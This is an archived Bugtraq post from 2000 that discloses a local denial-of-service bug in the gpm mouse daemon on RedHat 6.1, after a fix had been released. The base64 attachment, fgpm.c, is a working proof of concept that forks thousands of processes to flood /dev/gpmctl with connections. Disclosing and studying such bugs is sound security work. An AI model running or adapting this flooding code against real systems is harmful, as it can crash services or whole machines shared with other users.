linux, säkerhet

5214198 2000-06-20  18:39  /74 rader/ Postmaster
Mottagare: Bugtraq (import) <11349>
Ärende: Bug in gpm
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="-187412988-862755913-961507276=:1812"
Message-ID:  <Pine.LNX.4.10.10006201453090.1812-200000@apollo.aci.com.pl>
Date:         Tue, 20 Jun 2000 15:21:16 +0200
Reply-To: Tomasz Grabowski <cadence@APOLLO.ACI.COM.PL>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Tomasz Grabowski <cadence@APOLLO.ACI.COM.PL>
To: BUGTRAQ@SECURITYFOCUS.COM

  This message is in MIME format.  The first part should be readable
  text, while the remaining parts are likely unreadable without
  MIME-aware tools.  Send mail to mime@docserver.cac.washington.edu
  for more info.

---187412988-862755913-961507276=:1812
Content-Type: TEXT/PLAIN; charset=US-ASCII



Hello.

More than 6 months ago I discovered some kind of DoS bug in gpm
shipped with RedHat 6.1 (propably others).  Regular user can simply
DoS the gpm or (in several circumstances) the whole system.

In general the problem is that /dev/gpmctl uses STREAM and You can
flood it with many faked connections.

One week ago RedHat announced that the bug is *FIXED* now and
everyone can download a new version of this package from
redhat-rawhide
(/pub/Linux/redhat-rawhide/i386/RedHat/RPMS/gpm-1.19.2-1.i386.rpm),
so I decided to drop a note here.  The funny thing is that I couldn't
find info about it in ChangeLog of this package...


If You want to play with it try attached code.


___
Tomasz Grabowski [Akademickie Centrum Informatyki] {CADENCE of Lam3rZ}
The progress only comes through struggle...


---187412988-862755913-961507276=:1812
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="fgpm.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.10.10006201521160.1812@apollo.aci.com.pl>
Content-Description:
Content-Disposition: attachment; filename="fgpm.c"

DQovLyBGdWNrR3BtICAgIENBREVOQ0Ugb2YgTGFtM3JaICAgIDE5OTkuMTEu
MjMNCg0KI2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+
DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tl
dC5oPg0KI2luY2x1ZGUgPHN5cy91bi5oPg0KDQojZGVmaW5lIEdEWklFICAg
ICIvZGV2L2dwbWN0bCINCiNkZWZpbmUgUE9MQUNaRU5JQSAyMDANCiNkZWZp
bmUgU0hJVFkgICAxMDAwMA0KDQoNCmludCBtYWluICh2b2lkKQ0Kew0KIGlu
dCBhLGI7DQogc3RydWN0IHNvY2thZGRyX3VuIHN1bjsNCg0KIHN1bi5zdW5f
ZmFtaWx5ID0gQUZfVU5JWDsNCiBzdHJuY3B5IChzdW4uc3VuX3BhdGgsIEdE
WklFLCAzMCk7DQogcHJpbnRmICgiT0suLi5cbiIpOw0KDQogaWYgKGZvcmsg
KCkpDQogIGV4aXQgKDApOw0KDQogZm9yIChiID0gMDsgYiA8IFNISVRZOyBi
KyspDQogIGlmIChmb3JrICgpID09IDApDQogIGJyZWFrOw0KDQogZm9yIChi
ID0gMDsgYiA8IFBPTEFDWkVOSUE7IGIrKykNCiAgew0KICAgaWYgKChhID0g
c29ja2V0IChBRl9VTklYLCBTT0NLX1NUUkVBTSwgMCkpIDwgMCkNCiAgICB7
DQogICAgIHBlcnJvciAoInNvY2tldCIpOw0KICAgICB3aGlsZSAoMSk7DQog
ICB9DQoNCiAgaWYgKGNvbm5lY3QgKGEsIChzdHJ1Y3Qgc29ja2FkZHIgKikg
JnN1biwgc2l6ZW9mIChzdHJ1Y3Qgc29ja2FkZHIpKSA8IDApDQogICB7DQog
ICAgcGVycm9yICgiY29ubmVjdCIpOw0KICAgIGNsb3NlIChhKTsNCiAgICBi
LS07DQogICB9DQogIH0NCg0KIHdoaWxlICgxKTsNCn0NCg0KDQo=
---187412988-862755913-961507276=:1812--
(5214198) ------------------------------------------(Ombruten)